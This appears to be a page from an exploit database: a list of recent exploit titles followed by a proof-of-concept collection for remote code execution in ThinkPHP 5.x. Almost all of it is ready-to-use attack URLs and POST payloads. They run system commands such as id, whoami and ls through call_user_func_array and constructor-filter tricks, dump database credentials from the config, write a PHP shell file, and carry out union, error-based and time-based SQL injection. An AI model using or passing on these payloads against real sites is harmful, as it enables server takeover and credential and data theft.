
32 changes to exploits/shellcodes xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab) Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation Microsoft Windows 10 - SSPI Network Authentication Session 0 Privilege Escalation Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Open Privilege Escalation Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Delete Privilege Escalation Microsoft Windows 10 - DSSVC CanonicalAndValidateFilePath Security Feature Bypass Microsoft Windows 10 - DSSVC MoveFileInheritSecurity Privilege Escalation Microsoft Windows 10 - Browser Broker Cross Session Privilege Escalation Microsoft Windows 10 - COM Desktop Broker Privilege Escalation Hootoo HT-05 - Remote Code Execution (Metasploit) Across DR-810 ROM-0 - Backup File Disclosure i-doit CMDB 1.12 - Arbitrary File Download i-doit CMDB 1.12 - SQL Injection Horde Imp - 'imap_open' Remote Command Execution Modern POS 1.3 - Arbitrary File Download Modern POS 1.3 - SQL Injection Twilio WEB To Fax Machine System Application 1.0 - SQL Injection Live Call Support Widget 1.5 - Cross-Site Request Forgery (Add Admin) Live Call Support Widget 1.5 - Remote Code Execution / SQL Injection Craigs Classified Ads CMS Theme 1.0.2 - SQL Injection Find a Place CMS Directory 1.5 - SQL Injection Cleanto 5.0 - SQL Injection Lenovo R2105 - Cross-Site Request Forgery (Command Execution) HealthNode Hospital Management System 1.0 - SQL Injection Hucart CMS 5.7.4 - Cross-Site Request Forgery (Add Administrator Account) ThinkPHP 5.X - Remote Command Execution Real Estate Custom Script 2.0 - SQL Injection Job Portal Platform 1.0 - SQL Injection Umbraco CMS 7.12.4 - Authenticated Remote Code Execution Bigcart - Ecommerce Multivendor System 1.0 - SQL Injection Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection AudioCode 400HD - Command Injection
68 lines
No EOL
3.6 KiB
Text
68 lines
No EOL
3.6 KiB
Text
# Exploit Title: thinkphp 5.X RCE
|
||
# Date: 2019-1-14
|
||
# Exploit Author: vr_system
|
||
# Vendor Homepage: http://www.thinkphp.cn/
|
||
# Software Link: http://www.thinkphp.cn/down.html
|
||
# Version: 5.x
|
||
# Tested on: windows 7/10
|
||
# CVE : None
|
||
|
||
https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection
|
||
|
||
1、https://blog.thinkphp.cn/869075
|
||
2、https://blog.thinkphp.cn/910675
|
||
|
||
POC:
|
||
|
||
thinkphp 5.0.22
|
||
1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
|
||
2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
|
||
3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
|
||
4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
|
||
|
||
thinkphp 5
|
||
5、http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
|
||
|
||
thinkphp 5.0.21
|
||
6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
|
||
7、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
|
||
|
||
thinkphp 5.1.*
|
||
8、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
|
||
9、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
|
||
10、http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
|
||
11、http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
|
||
12、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
|
||
13、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
|
||
14、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
|
||
15、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
|
||
|
||
未知版本
|
||
16、?s=index/\think\module/action/param1/${@phpinfo()}
|
||
17、?s=index/\think\Module/Action/Param/${@phpinfo()}
|
||
18、?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
|
||
19、index.php?s=/home/article/view_recent/name/1'
|
||
header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
|
||
20、index.php?s=/home/shopcart/getPricetotal/tag/1%27
|
||
21、index.php?s=/home/shopcart/getpriceNum/id/1%27
|
||
22、index.php?s=/home/user/cut/id/1%27
|
||
23、index.php?s=/home/service/index/id/1%27
|
||
24、index.php?s=/home/pay/chongzhi/orderid/1%27
|
||
25、index.php?s=/home/pay/index/orderid/1%27
|
||
26、index.php?s=/home/order/complete/id/1%27
|
||
27、index.php?s=/home/order/complete/id/1%27
|
||
28、index.php?s=/home/order/detail/id/1%27
|
||
29、index.php?s=/home/order/cancel/id/1%27
|
||
30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
|
||
31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1
|
||
Content-Disposition: form-data; name="couponid"
|
||
1') union select sleep('''+str(sleep_time)+''')#
|
||
|
||
thinkphp 5.0.23(完整版)debug模式
|
||
32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx
|
||
|
||
thinkphp 5.0.23(完整版)
|
||
33、(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al
|
||
|
||
thhinkphp 5.0.10(完整版)
|
||
34、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system |